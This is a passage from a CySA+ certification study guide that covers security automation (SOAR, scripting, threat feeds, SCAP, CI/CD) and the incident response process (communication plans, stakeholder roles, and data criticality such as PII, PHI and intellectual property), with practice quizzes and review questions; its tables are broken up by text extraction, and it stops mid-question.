integrity, and availability (CIA) of data
Data
classificat
ion policy
A measure of how freely data can be handled
Sensitivit
y
Ensures that all systems have been secured to the
fullest extent possible and still provide functionality
Criticality
A measure of the importance of the data
5. List the military/government data classification levels in
order.
6. A(n) _____________________ is a segment of the
communication path that an attack uses to access a
vulnerability.
7. Match the following terms with their definitions.
Terms
Definitions
Intel
ligen
ce
inte
grati
on
Solution deployed by cloud service providers for
improvement
CMa
aS
Foreign government interested in pilfering data,
including intellectual property
Hun
t
tea
min
g
The consideration and analysis of intelligence data from
a perspective that combines multiple data sources and
attempts to make inferences based on this data
integration
Stat
e
spon
sor
New approach to security that is offensive in nature
rather than defensive, which has been common for
security teams in the past
8. List at least two hardening techniques.
9. Data should be classified based on its _____________ to
the organization and its ____________ to disclosure.
10. Match the following terms with their definitions.
Term
s
Pr
oce
ss
Ex
Definitions
A proposed explanation of something
plo
rer
Hy
pot
hes
is
Actor with malicious intent
Bla
ck
hat
Enables you to look at the graph that appears in Task
Manager and identify what caused spikes in the past,
which is not possible with Task Manager alone
Th
rea
t
mo
del
A conceptual design that attempts to provide a framework
on which to implement security efforts
Chapter 14
Automation Concepts and
Technologies
This chapter covers the following topics related to Objective 3.4
(Compare and contrast automation concepts and technologies) of
the CompTIA Cybersecurity Analyst (CySA+) CS0-002
certification exam:
Workflow orchestration: Describes the process of Security
Orchestration, Automation, and Response (SOAR) and its role in
security.
Scripting: Reviews the scripting process and its role in
automation.
Application programming interface (API) integration:
Describes how this process reduces access to an application’s
internal functions through an API.
Automated malware signature creation: Identifies an
automated process of malware identification.
Data enrichment: Discusses processes used to enhance, refine, or
otherwise improve raw data.
Threat feed combination: Defines a process for making use of
data from multiple intelligence feeds.
Machine learning: Describes the role machine learning plays in
automated security.
Use of automation protocols and standards: Identifies
various protocols and standards, including Security Content
Automation Protocol (SCAP), and their application.
Continuous integration: Covers the process of ongoing
integration of software components during development.
Continuous deployment/delivery: Covers the process of
ongoing review and upgrade of software.
Traditionally, network operations and threat intelligence
activities were performed manually by technicians. Increasingly
in today’s environments, these processes are being automated
through the use of scripting and other automation tools. This
chapter explores how workflows can be automated.
“DO I KNOW THIS ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to assess
whether you should read the entire chapter. If you miss no more
than one of these ten self-assessment questions, you might want
to skip ahead to the “Exam Preparation Tasks” section. Table
14-1 lists the major headings in this chapter and the “Do I Know
This Already?” quiz questions covering the material in those
headings so that you can assess your knowledge of these specific
areas. The answers to the “Do I Know This Already?” quiz
appear in Appendix A.
Table 14-1 “Do I Know This Already?” Foundation Topics
Section-to-Question Mapping
Foundation Topics Section
Questio
n
Workflow Orchestration
1
Scripting
2
Application Programming Interface (API)
Integration
3
Automated Malware Signature Creation
4
Data Enrichment
5
Threat Feed Combination
6
Machine Learning
7
Use of Automation Protocols and Standards
8
Continuous Integration
9
Continuous Deployment/Delivery
10
1. Which of the following enables you to automate the response
to a security issue? (Choose the best answer.)
1. Orchestration
2. Piping
3. Scripting
4. Virtualization
2. Which scripting language is used to work in the Linux
interface?
1. Python
2. Bash
3. Ruby
4. Perl
3. Which of the following is used to provide integration
between your website and a payment gateway?
1. Perl
2. Orchestration
3. API
4. Scripting
4. Which of the following is an additional method of
identifying malware?
1. DHCP snooping
2. DAI
3. Automated malware signature creation
4. Piping
5. When you receive bulk e-mail from a vendor and it refers to
you by first name, what technique is in use?
1. Scripting
2. Orchestration
3. Heuristics
4. Data enrichment
6. Threat feeds inform the recipient about all but which of the
following?
1. Presence of malware on the recipient
2. Suspicious domains
3. Lists of known malware hashes
4. IP addresses associated with malicious activity
7. Which of the following is an example of machine learning?
1. NAC
2. AEG
3. EDR
4. DLP
8. Which of the following is a standard that the security
automation community uses to enumerate software flaws
and configuration issues?
1. NAC
2. DAC
3. SCAP
4. DLP
9. Which of the following is a software development practice
whereby the work of multiple individuals is combined a
number of times a day?
1. Sinkholing
2. Continuous integration
3. Aggregation
4. Inference
10. Which of the following is considered the next generation of
DevOps and attempts to make sure that software developers
can release new product changes to customers quickly in a
sustainable way?
1. Agile
2. DevSecOps
3. Continuous deployment/delivery
4. Scrum
FOUNDATION TOPICS
WORKFLOW ORCHESTRATION
Workflow orchestration is the sequencing of events based
on certain parameters by using scripting and scripting tools.
Over time orchestration has been increasingly used to automate
processes that were formerly carried out manually by humans.
In virtualization, it is quite common to use orchestration. For
example, in the VMware world, technicians can create what are
called apps, groups of virtual machines that are managed and
orchestrated as a unit to provide a service to users. Using
orchestration tools, you can set one device to always boot before
another device. For example, in an Windows Active Directory
environment, you may need the domain controller (DC) to boot
up before the database server so that the database server can
property authenticate to the DC and function correctly.
Figure 14-1 shows another, more complex automated workflow
orchestration using VMware vCloud Automation Center (vCAC).
Figure 14-1 Workflow Orchestration
The workflow is sequenced to occur in the following fashion:
1. A request comes in to write to the disk.
2. The disk space is checked.
3. Insufficient space is found.
4. A change request is generated for more space.
5. A disk is added.
6. The configuration database is updated.
7. The user is notified.
While this is one use of workflow orchestration, it can also be
used in the security world. Examples include
Dynamic incident response plans that adapt in real time
Automated workflows to empower analysts and enable faster
response
SCRIPTING
Scripting languages and scripting tools are used to automate a
process. Common scripting languages include
bash: Used to work in the Linux interface
Node js: Framework to write network applications using
JavaScript
Ruby: Great for web development
Python: Supports procedure-oriented programming and objectoriented programming
Perl: Found on all Linux servers, helps in text manipulation tasks
Windows PowerShell: Found on all Windows servers
Scripting tools that require less knowledge of the actual syntax
of the language can also be used, such as
Puppet
Chef
Ansible
For example, Figure 14-2 shows Puppet being used to automate
the update of Apache servers.
FIGURE 14-2 Puppet Orchestration
APPLICATION PROGRAMMING
INTERFACE (API) INTEGRATION
As a review, an API is a set of clearly defined methods of
communication between various software components. As such,
you should think of an API as a connection point that requires
security consideration. For example, an API between your ecommerce site and a payment gateway must be secure. So, what
is API integration and why is it important?
API integration means that the applications on either end of
the API are synchronized and protecting the integrity of the
information that passes across the API. It also enables the
proper updating and versioning required in many
environments. The term also describes the relationship between
a website and an API when the API is integrated into the
website.
AUTOMATED MALWARE SIGNATURE
CREATION
Automated malware signature creation is an additional
method of identifying malware. The antivirus software monitors
incoming unknown files for the presence of malware and
analyzes each file based on both classifiers of file behavior and
classifiers of file content. The file is then classified as having a
particular malware classification. Subsequently, a malware
signature is generated for the incoming unknown file based on
the particular malware classification. This malware signature
can be used by an antivirus program as a part of the antivirus
program’s virus identification processes.
DATA ENRICHMENT
Data enrichment is a technique that allows one process to
gather information from another process or source and then
customize a response to a third source using the data from the
second process or source. When you receive bulk e-mail from a
vendor and it refers to you by first name, that is an example of
data enrichment in use. In that case a file of email addresses is
consulted (second process) and added to the response to you.
Another common data enrichment process would, for example,
correct likely misspellings or typographical errors in a database
by using precision algorithms designed for that purpose.
Another way in which data enrichment can work is by
extrapolating data.
This can create a privacy issue that has been raised by the EU
General Data Protection Regulation (GDPR), leading to some
privacy regulations by the EU that limit data enrichment for this
very reason. Users typically have a reasonable idea about which
information they have provided to a specific organization, but if
the organization adds information from other databases, this
picture will be skewed. The organization will have information
about them of which they are not aware.
Figure 14-3 shows another security-related example of the data
enrichment process. This is an example of an automated
process used by a security analytics platform called Blue Coat.
The data enrichment part of the process occurs at Steps 4 and 5
when information from an external source is analyzed and used
to enrich the alert message that is generated from the file
detected.
Figure 14-3 Data Enrichment Process Example
THREAT FEED COMBINATION
A threat feed is a constantly updating stream of intelligence
about threat indicators and artifacts that is delivered by a thirdparty security organization. Threat feeds are used to inform the
organization as quickly as possible about new threats that have
been identified. Threat feeds contain information including
Suspicious domains
Lists of known malware hashes
IP addresses associated with malicious activity
Chapter 11, “Analyzing Data as Part of Security Monitoring
Activities,” described how a SIEM aggregates the logs from
various security devices into a single log for analysis. By
analyzing the single aggregated log, inferences can be made
about potential issues or attacks that would not be possible if
the logs were analyzed separately.
Using SIEM (or other aggregation tools) to aggregate threat
feeds can also be beneficial, and tools and services such as the
following offer this type of threat feed combination:
Combine: Gathers threat intelligence feeds from publicly available
sources
Palo Alto Networks AutoFocus: Provides intelligence,
correlation, added context, and automated prevention workflows
Anomali ThreatStream: Helps deduplicate data, removes false
positives, and feeds intelligence to security tools
ThreatQuotient: Helps accelerate security operations with an
integrated threat library and shared contextual intelligence
ThreatConnect: Combines external threat data from trusted
sources with in-house data
MACHINE LEARNING
Artificial intelligence (AI) and machine learning have
fascinated humans for decades. Artificial intelligence (AI) is the
capability of a computer system to make decisions using
human-like intelligence. Machine learning is a way to make that
possible by creating algorithms that enable the system to learn
from what it sees and apply it. Since the first time we conceived
of the idea of talking to a computer and getting an answer like
characters did in comic books years ago, we have waited for the
day to come when smart robots would not just do the dirty work
but also learn just as humans do.
Today, robots are taking on increasingly more and more
detailed work. One of the exciting areas where AI and machine
learning are yielding dividends is in intelligent network security
—or the intelligent network. These networks seek out their own
vulnerabilities before attackers do, learn from past errors, and
work on a predictive model to prevent attacks.
For example, automatic exploit generation (AEG) is the “first
end-to-end system for fully automatic exploit generation,”
according to the Carnegie Mellon Institute’s own description of
its AI named Mayhem. Developed for off-the-shelf as well as the
enterprise software being increasingly used in smart devices
and appliances, AEG can find a bug and determine whether it is
exploitable.
USE OF AUTOMATION PROTOCOLS AND
STANDARDS
As in almost every other area of IT, standards and protocols for
automation have emerged to help support the development and
sharing of threat information. As with all standards, the goal is
to arrive at common methods of sharing threat data.
Security Content Automation Protocol (SCAP)
Chapter 2, “Utilizing Threat Intelligence to Support
Organizational Security,” introduced the Common Vulnerability
Scoring System (CVSS), a common system for describing the
characteristics of a threat in a standard format. The ranking of
vulnerabilities that are discovered is based on predefined
metrics that also are used by the Security Content
Automation Protocol (SCAP). This is a standard that the
security automation community uses to enumerate software
flaws and configuration issues. It standardized the
nomenclature and formats used. A vendor of security
automation products can obtain a validation against SCAP,
demonstrating that it will interoperate with other scanners and
express the scan results in a standardized way.
Understanding the operation of SCAP requires an
understanding of its identification schemes, one of which you
learned about, CVE. Let’s review it.
Common Configuration Enumeration (CCE): These are
configuration best practice statements maintained by the National
Institute of Standards and Technology (NIST).
Common Platform Enumeration (CPE): These are methods
for describing and classifying operating systems, applications, and
hardware devices.
Common Weakness Enumeration (CWE): These are design
flaws in the development of software that can lead to
vulnerabilities.
Common Vulnerabilities and Exposures (CVE): These are
vulnerabilities in published operating systems and applications
software.
A good example of the implementation of this is the Window
System Center Configuration Manager Extensions for SCAP. It
allows for the conversion of SCAP data files to Desired
Configuration Management (DCM) Configuration Packs and
converts DCM reports into SCAP format.
CONTINUOUS INTEGRATION
Continuous integration is a software development practice
whereby the work of multiple individuals is combined a number
of times a day. The idea behind this is to identity bugs as early
as possible in the development process. As it relates to security,
the goal of continuous integration is to locate security issues as
soon as possible. Continuous integration security testing
improves code integrity, leads to more secure software systems,
and reduces the time it takes to release new updates. Usually,
merging all development versions of the code base occurs
multiple times throughout a day. Figure 14-4 illustrates this
process.
Figure 14-4 Continuous Integration
CONTINUOUS DEPLOYMENT/DELIVERY
Taking continuous integration one step further is the concept of
continuous deployment/delivery. It is considered the next
gen of DevOps and attempts to make sure that software
developers can release new changes to customers quickly in a
sustainable way. Continuous deployment goes one step further
with every change that passes all stages of your production
pipeline being released to your customers. This helps to
improve the feedback loop. Figure 14-5 illustrates the
relationship between the three concepts.
Figure 14-5 Continuous Integration, Continuous Delivery,
and Continuous Deployment
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in the
Introduction, you have several choices for exam preparation:
the exercises here, Chapter 22, “Final Preparation,” and the
exam simulation questions in the Pearson Test Prep Software
Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted with
the Key Topics icon in the outer margin of the page. Table 14-2
lists a reference of these key topics and the page numbers on
which each is found.
Table 14-2 Key Topics in Chapter 14
Key Topic Element
Figur
e 14-1
Description
Workflow orchestration
Page Number
4
2
2
Bullet
ed list
Common scripting languages
4
2
3
Bullet
ed list
Scripting tools
4
2
3
Figur
e 14-3
Data enrichment example
4
2
5
Bullet
ed list
Threat feed aggregation tools
4
2
6
Bullet
ed list
SCAP components
4
2
7
Figur
e 14-4
Continuous integration
4
2
8
Figur
e 14-5
Continuous integration, continuous delivery, and
continuous deployment
4
2
9
DEFINE KEY TERMS
Define the following key terms from this chapter and check your
answers in the glossary:
workflow orchestration
scripting
application programming interface (API) integration
bash
Node.js
Ruby
Python
Perl
automated malware signature creation
data enrichment
threat feed
machine learning
Security Content Automation Protocol (SCAP)
Common Configuration Enumeration (CCE)
Common Platform Enumeration (CPE)
Common Weakness Enumeration (CWE)
Common Vulnerabilities and Exposures (CVE)
continuous integration
continuous deployment/delivery
REVIEW QUESTIONS
1. _______________ is the sequencing of events based on
certain parameters by using scripting and scripting tools.
2. List at least one use of workflow orchestration in the
security world.
3. Match the following terms with their definitions.
Term
s
Definitions
Ru
by
Used to work in the Linux interface
Perl
Framework to write network applications using
JavaScript
Pyt
hon
Supports procedure-oriented programming and objectoriented programming
bas
h
Great for web development
4. __________________ is a scripting tool found in
Windows servers.
5. List at least two of the components of SCAP.
6. Puppet is a ________________________ tool.
7. List at least two types of information available from threat
feeds.
8. Match the following SCAP terms with their definitions.
Ter
ms
Definitions
C
C
E
Methods for describing and classifying operating systems,
applications, and hardware devices
C
V
E
Vulnerabilities in published operating systems and
applications software
C
W
E
Design flaws in the development of software that can lead to
vulnerabilities
C
P
E
Configuration best practice statements maintained by NIST
9. _________________________ is a software
development practice whereby the work of multiple
individuals is combined a number of times a day.
10. List at least two threat feed aggregation tools.
11. Match the following terms with their definitions.
Terms
Definitions
Threat
feed
Technique that allows one process to gather
information from another process or source and
then customize a response using the data from the
second process or source
Data
enrichm
ent
Set of clearly defined methods of communication
between various software components
Automat
ed
malware
signatur
e
creation
Constantly updating streams of indicators or
artifacts derived from a source outside the
organization
API
Additional method of identifying malware
12. ______________________ are groups of VMware
virtual machines that are managed and orchestrated as a
unit to provide a service to users.
Chapter 15
The Incident Response
Process
This chapter covers the following topics related to Objective 4.1
(Explain the importance of the incident response process) of the
CompTIA Cybersecurity Analyst (CySA+) CS0-002 certification
exam:
Communication plan: Describes the proper incident response
processes for communication during an incident, which includes
limiting communications to trusted parties, disclosing based on
regulatory/legislative requirements, preventing inadvertent release
of information, using a secure method of communication, and
reporting requirements.
Response coordination with relevant entities: Describes the
entities with which coordination is required during an incident,
including legal, human resources, public relations, internal and
external, law enforcement, senior leadership, and regulatory bodies.
Factors contributing to data criticality: Identifies factors that
determine the criticality of an information resource, which include
personally identifiable information (PII), personal health
information (PHI), sensitive personal information (SPI), high value
asset, financial information, intellectual property, and corporate
information.
The incident response process is a formal approach to
responding to security issues. It attempts to avoid the
haphazard approach that can waste time and resources. This
chapter and the next chapter examine this process.
“DO I KNOW THIS ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to assess
whether you should read the entire chapter. If you miss no more
than one of these six self-assessment questions, you might want
to skip ahead to the “Exam Preparation Tasks.” Table 15-1 lists
the major headings in this chapter and the “Do I Know This
Already?” quiz questions covering the material in those
headings so that you can assess your knowledge of these specific
areas. The answers to the “Do I Know This Already?” quiz
appear in Appendix A.
Table 15-1 “Do I Know This Already?” Foundation Topics
Section-to-Question Mapping
Foundation Topics Section
Questions
Communication Plan
1, 2
Response Coordination with Relevant Entities
3, 4
Factors Contributing to Data Criticality
5, 6
1. Which of the following is false with respect to the incident
response communication plan?
1. Organizations in certain industries may be required to comply
with regulatory or legislative requirements with regard to
communicating data breaches.
2. Content of these communications should include as much
information as possible.
3. All responders should act to prevent the disclosure of any
information to parties that are not specified in the
communication plan.
4. All communications that takes place between the stakeholders
should use a secure communication process.
2. Which of the following HIPAA rules requires covered
entities and their business associates to provide notification
following a breach of unsecured PHI?
1. Breach Notification Rule
2. Privacy Rule
3. Security Rule
4. Enforcement Rule
3. Which of the following is responsible for reviewing NDAs to
ensure support for incident response efforts?
1. Human resources
2. Legal
3. Management
4. Public relations
4. Which of the following is responsible for developing all
written responses to the outside world concerning an
incident and its response?
1. Human resources
2. Legal
3. Management
4. Public relations
5. Which of the following is any piece of data that can be used
alone or with other information to identify a single person?
1. Intellectual property
2. Trade secret
3. PII
4. PPP
6. Which of the following is not intellectual property?
1. Patent
2. Trade secret
3. Trademark
4. Contract
FOUNDATION TOPICS
COMMUNICATION PLAN
Over time, best practices have evolved for handling the
communication process between stakeholders. By following
these best practices, you have a greater chance of maintaining
control of the process and achieving the goals of incident
response. Failure to follow these guidelines can lead to lawsuits,
the premature alerting of the suspected party, potential
disclosure of sensitive information, and, ultimately, an incident
response process that is less effective than it could be.
Limiting Communication to Trusted Parties
During an incident, communications should take place only
with those who have been designated beforehand to receive
such communications. Moreover, the content of these
communications should be limited to what is necessary for each
stakeholder to perform his or her role.
Disclosing Based on Regulatory/Legislative Requirements
Organizations in certain industries may be required to comply
with regulatory or legislative requirements with regard to
communicating data breaches to affected parties and to those
agencies and legislative bodies promulgating these regulations.
The organization should include these communication types in
the communication plan.
Preventing Inadvertent Release of Information
All responders should act to prevent the disclosure of any
information to parties that are not specified in the
communication plan. Moreover, all information released to the
public and the press should be handled by public relations or
persons trained for this type of communication. The timing of
all communications should also be specified in the plan.
Using a Secure Method of Communication
All communications that take place between the stakeholders
should use a secure communication process to ensure that
information is not leaked or sniffed. Secure communication
channels and strong cryptographic mechanisms should be used
for these communications. The best approach is to create an
out-of-band method of communication, which does not use the
regular methods of corporate e-mail or VoIP. While personal
cell phones can be a method for voice communication, file and
data exchange should be through a method that provides endto-end encryption, such as Off-the-Record (OTR) Messaging.
Reporting Requirements
Beyond the communication requirements within the
organization, there may be legal obligations to report to
agencies or governmental bodies during and following a security
incident. Especially when sensitive customer, vendor, or
employee records are exposed, organizations are required to
report this in a reasonable time frame.
For example, in the healthcare field, the HIPAA Breach
Notification Rule, 45 CFR §§ 164.400-414, requires HIPAA
covered entities and their business associates to provide
notification following a breach of unsecured protected health
information (PHI). As another example, all 50 states, the
District of Columbia, Guam, Puerto Rico, and the Virgin Islands
have enacted legislation requiring private or governmental
entities to notify individuals of security breaches of information
involving personally identifiable information (PII). PHI and PII
are described in more detail later in this chapter.
RESPONSE COORDINATION WITH
RELEVANT ENTITIES
During an incident, proper communication among the various
stakeholders in the process is critical to the success of the
response. One key step that helps ensure proper communication
is to select the right people for the incident response (IR) team.
Because these individuals will be responsible for
communicating with stakeholders, communication skills should
be a key selection criterion for the IR team. Moreover, this team
should take the following steps when selecting individuals to
represent each stakeholder community:
Select representatives based on communication skills.
Hold regular meetings.
Use proper escalation procedures.
The following sections identify these stakeholders, discuss why
the communication process is important, describe best practices
for the communication process, and list the responsibilities of
various key roles involved in the response.
Legal
The role of the legal department is to do the following:
Review nondisclosure agreements (NDAs) to ensure support for
incident response efforts.
Develop wording of documents used to contact possibly affected
sites and organizations.
Assess site liability for illegal computer activity.
Human Resources
The role of the HR department involves the following
responsibilities in response:
Develop job descriptions for those persons who will be hired for
positions involved in incident response.
Create policies and procedures that support the removal of
employees found to be engaging in improper or illegal activity.
For example, HR should ensure that these activities are spelled
out in policies and new hire documents as activities that are
punishable by firing. This can help avoid employment disputes
when the firing occurs.
Public Relations
The role of public relations is managing the dialog between the
organization and the outside world. One person should be
designated to do all talking to the media so as to maintain a
consistent message. Responsibilities of the PR department
include the following:
Handling all press conferences that may be held
Developing all written response to the outside world concerning the
incident and its response
Internal and External
Most of the stakeholders will be internal to the organization but
not all. External stakeholders (law enforcement, industry
organizations, and media) should be managed separately from
the internal stakeholders. Communications to external
stakeholders may require a different and more secure medium.
Law Enforcement
Law enforcement may become involved in many incidents.
Sometimes they are required to become involved, but in many
instances, the organization is likely to invite law enforcement to
get involved. When making a decision about whether to involve
law enforcement, consider the following factors:
Law enforcement will view the incident differently than the
company security team views it. While your team may be more
motivated to stop attacks and their damage, law enforcement may
be inclined to let an attack proceed in order to gather more
evidence.
The expertise of law enforcement varies. While contacting local law
enforcement may be indicated for physical theft of computers and
similar incidents, involving law enforcement at the federal level,
where greater skill sets are available, may be indicated for more
abstract crimes and events. The USA PATRIOT Act enhanced the
investigatory tools available to law enforcement and expanded their
ability to look at e-mail communications, telephone records,
Internet communications, medical records, and financial records,
which can be helpful.
Before involving law enforcement, try to rule out other potential
causes of an event, such as accidents and hardware or software
failure.
In cases where laws have obviously been broken (child
pornography, for example), immediately get law enforcement
involved. This includes any felonies, regardless of how small the
loss to the company may have been.
Senior Leadership
The most important factor in the success of an incident
response plan is the support, both verbal and financial (through
the budget process), of senior leadership. Moreover, all other
levels of management should fall in line with support of all
efforts. Specifically, senior leadership’s role involves the
following:
Communicate the importance of the incident response plan to all
parts of the organization.
Create agreements that detail the authority of the incident response
team to take over business systems if necessary.
Create decision systems for determining when key systems must be
removed from the network.
Regulatory Bodies
Earlier in this chapter you learned that there are reporting
requirements to certain governmental bodies when a data
breach occurs. This makes these agencies external stakeholders.
Be aware of reporting requirements based on the industry in
which the organization operates. An incident response should
be coordinated with any regulatory bodies that regulate the
industry in which the organization operates.
FACTORS CONTRIBUTING TO DATA
CRITICALITY
Once the sensitivity and criticality of data are understood and
documented, the organization should work to create a data
classification system. Most organizations use either a
commercial business classification system or a military and
government classification system.
To properly categorize data types, a security analyst should be
familiar with some of the most sensitive types of data that the
organization may possess.
When responding to an incident the criticality of the data at risk
should be a prime consideration when assigning resources to
the incident. When the data at risk is more critical, the more
resources should be assigned to the issue, because it becomes
more important that time is of the essence to identify and
correct any settings or policies that are implicated in the
incident.
Personally Identifiable Information (PII)
When considering technology and its use today, privacy is a
major concern of users. This privacy concern usually involves
three areas: which personal information can be shared with
whom, whether messages can be exchanged confidentially, and
whether and how one can send messages anonymously. Privacy
is an integral part of any security measures that an organization
takes.
As part of the security measures that organizations must take to
protect privacy, personally identifiable information
(PII) must be understood, identified, and protected. PII is any
piece of data that can be used alone or with other information to
identify a single person. Any PII that an organization collects
must be protected in the strongest manner possible. PII
includes full name, identification numbers (including driver’s
license number and Social Security number), date of birth, place
of birth, biometric data, financial account numbers (both bank
account and credit card numbers), and digital identities
(including social media names and tags).
Keep in mind that different countries and levels of government
can have different qualifiers for identifying PII. Security
professionals must ensure that they understand international,
national, state, and local regulations and laws regarding PII. As
the theft of this data becomes even more prevalent, you can
expect more laws to be enacted that will affect your job. Figure
15-1 shows examples of PII.
FIGURE 15-1 Personally Identifiable Information
The most obvious reaction to the issue of privacy is the
measures in the far-reaching EU General Data Protection
Regulation (GDPR) The GDPR aims primarily to give control to
individuals over their personal data and to simplify the
regulatory environment for international business by unifying
the regulation within the EU.
Personal Health Information (PHI)
One particular type of PII that an organization might possess is
personal health information (PHI). PHI includes the
medical records of individuals and must be protected in specific
ways, as prescribed by the regulations contained in the Health
Insurance Portability and Accountability Act of 1996 (HIPAA).
HIPAA, also known as the Kennedy-Kassebaum Act, affects all
healthcare facilities, health insurance companies, and
healthcare clearinghouses. It is enforced by the Office for Civil
Rights (OCR) of the Department of Health and Human Services
(HHS). It provides standards and procedures for storing, using,
and transmitting medical information and healthcare data.
HIPAA overrides state laws unless the state laws are stricter.
Additions to this law now extend its requirements to third
parties that do work for covered organizations in which those
parties handle this information.
Note
Objective 4.1 of the CySA+ exam refers to PHI as personal health information,
whereas HIPAA refers to it as protected health information.
Sensitive Personal Information (SPI)
Some types of information should receive special treatment, and
certain standards have been designed to protect this
information. This type of data is called sensitive personal
information (SPI). The best example of this is credit card
information. Almost all companies possess and process credit
card data. Holders of this data must protect it. Many of the
highest-profile security breaches that have occurred have
involved the theft of this data. The Payment Card Industry
Data Security Standard (PCI DSS) affects any
organizations that handle cardholder information for the major
credit card companies. The latest version at the time of writing
is 3.2.1. To prove compliance with the standard, an organization
must be reviewed annually. Although PCI DSS is not a law, this
standard has affected the adoption of several state laws.
High Value Assets
Some assets are not actually information but systems that
provide access to information. When these systems or groups of
systems provide access to data required to continue to do
business, they are called critical systems. While it is somewhat
simpler to arrive at a value for physical assets such as servers,
routers, switches, and other devices, in cases where these
systems provide access to critical data or are required to
continue a business-critical process, their value is more than the
replacement cost of the hardware. The assigned value should be
increased to reflect its importance in providing access to data or
its role in continuing a critical process.
Financial Information
Financial and accounting data in today’s networks is typically
contained in accounting information systems (AISs). While
these systems offer valuable integration with other systems,
such as HR and customer relationship management systems,
this integration comes at the cost of creating a secure
connection between these systems. Many organizations are also
abandoning legacy accounting software for cloud-based vendors
to maximize profit. Cloud arrangements bring their own
security issues, such as the danger of data comingling in the
multitenancy environment that is common in public clouds.
Moreover, considering that a virtual infrastructure underlies
these cloud systems, all the dangers of the virtual environment
come into play.
Considering the criticality of this data and the need of the
organization to keep the bulk of it confidential, incidents that
target this type of information or the systems that provide
access to this data should be given high priority. The following
steps should be taken to protect this information:
Always ensure physical security of the building.
Ensure that a firewall is deployed at the perimeter and make use of
all its features, such as URL and application filtering, intrusion
prevention, antivirus scanning, and remote access via virtual
private networks and TLS/SSL encryption.
Diligently audit file and folder permissions on all server resources.
Encrypt all accounting data.
Back up all accounting data and store it on servers that use
redundant technologies such as RAID.
Intellectual Property
Intellectual property is a tangible or intangible asset to
which the owner has exclusive rights. Intellectual property law
is a group of laws that recognize exclusive rights for creations of
the mind. The intellectual property covered by this type of law
includes the following:
Patents
Trade secrets
Trademarks
Copyrights
The following sections explain these types of intellectual
properties and their internal protection.
Patent
A patent is granted to an individual or a company to protect an
invention that is described in the patent’s application. When the
patent is granted, only the patent owner can make, use, or sell
the invention for a period of time, usually 20 years. Although a
patent is considered one of the strongest intellectual property
protections available, the invention becomes public domain
after the patent expires, thereby allowing any entity to
manufacture and sell the product.
Patent litigation is common in today’s world. You commonly see
technology companies, such as Apple, HP, and Google, filing
lawsuits regarding infringement on patents (often against each
other). For this reason, many companies involve a legal team in
patent research before developing new technologies. Being the
first to be issued a patent is crucial in today’s highly competitive
market.
Any product that is produced and is currently undergoing the
patent application process is usually identified with the Patent
Pending seal, shown in Figure 15-2.
Figure 15-2 Patent Pending Seal
Trade Secret
A trade secret ensures that proprietary technical or business
information remains confidential. A trade secret gives an
organization a competitive edge. Trade secrets include recipes,
formulas, ingredient listings, and so on that must be protected
against disclosure. After a trade secret is obtained by or
disclosed to a competitor or the general public, it is no longer
considered a trade secret. Most organizations that have trade
secrets attempt to protect them by using nondisclosure
agreements (NDAs). An NDA must be signed by any entity that
has access to information that is part of a trade secret. Anyone
who signs an NDA will suffer legal consequences if the
organization is able to prove that the signer violated it.
Trademark
A trademark ensures that a symbol, a sound, or an expression
that identifies a product or an organization is protected from
being used by another organization. A trademark allows a
product or an organization to be recognized by the general
public. Most trademarks are marked with one of the
designations shown in Figure 15-3. If a trademark is not
registered, an organization should use a capital TM. If the
trademark is registered, an organization should use a capital R
that is encircled.
Figure 15-3 Trademark Designations
Copyright
A copyright ensures that a work that is authored is protected
from any form of reproduction or use without the consent of the
copyright holder, usually the author or artist who created the
original work. A copyright lasts longer than a patent.
Although the U.S. Copyright Office has several guidelines to
determine the amount of time a copyright lasts, the general rule
for works created after January 1, 1978, is the life of the author
plus 70 years. In 1996, the World Intellectual Property
Organization (WIPO) standardized the treatment of digital
copyrights. Copyright management information (CMI) is
licensing and ownership information that is added to any digital
work. In this standardization, WIPO stipulated that CMI
included in copyrighted material cannot be altered. The ©
symbol denotes a work that is copyrighted.
Securing Intellectual Property
Intellectual property of an organization, including patents,
copyrights, trademarks, and trade secrets, must be protected, or
the business loses any competitive advantage created by such
properties. To ensure that an organization retains the
advantages given by its IP, it should do the following:
Invest in well-written NDAs to be included in employment
agreements, licenses, sales contracts, and technology transfer
agreements.
Ensure that tight security protocols are in place for all computer
systems.
Protect trade secrets residing in computer systems with encryption
technologies or by limiting storage to computer systems that do not
have external Internet connections.
Deploy effective insider threat countermeasures, particularly
focused on disgruntlement detection and mitigation techniques.
Corporate Information
Corporate confidential data is anything that needs to be kept
confidential within the organization. This can include the
following:
Plan announcements
Processes and procedures that may be unique to the organization
Profit data and estimates
Salaries
Market share figures
Customer lists
Performance appraisals
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in the
Introduction, you have several choices for exam preparation:
the exercises here, Chapter 22, “Final Preparation,” and the
exam simulation questions in the Pearson Test Prep Software
Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted with
the Key Topics icon in the outer margin of the page. Table 15-2
lists a reference of these key topics and the page numbers on
which each is found.
Table 15-2 Key Topics in Chapter 15
Key Topic Element
Description
Page Number
Bulle
ted
list
Considerations when selecting individuals to
represent each stakeholder community
4
3
6
Bulle
ted
list
Role of the legal department in incident response
4
3
6
Bulle
ted
list
Role of the HR department in incident response
4
3
7
Bulle
ted
list
Role of the public relations department in
incident response
4
3
7
Bulle
ted
list
Considerations when making a decision about
whether to involve law enforcement
4
3
8
Bulle
ted
list
Role of senior leadership in incident response
4
3
8
Para
grap
Description of personally identifiable information
(PII)
4
3
h
9
Bulle
ted
list
Steps that should be taken to protect financial
information
4
4
2
Bulle
ted
list
Examples of intellectual property
4
4
2
Bulle
ted
list
Securing intellectual property
4
4
4
Bulle
ted
list
Examples of corporate confidential data
4
4
4
DEFINE KEY TERMS
Define the following key terms from this chapter and check your
answers in the glossary:
HIPAA Breach Notification Rule
USA PATRIOT Act
sensitivity
criticality
personally identifiable information (PII)
personal health information (PHI)
sensitive personal information (SPI)
Payment Card Industry Data Security Standard (PCI DSS)
intellectual property
patent
trade secret
trademark
copyright
REVIEW QUESTIONS
1. After a breach, all information released to the public and the
press should be handled by _________________.
2. List at least one job of the human resources department
with regard to incident response.
3. Match the following terms with their definitions
Terms
Definitions
HIPAA Breach
Notification
Rule
Enhanced the investigatory tools available to
law enforcement
USA PATRIOT
Act
Affects any organizations that handle
cardholder information for the major credit
card companies
Payment Card
Industry Data
Security
Standard (PCI
DSS)
Requires covered entities and their business
associates to provide notification following a
loss of unsecured protected health
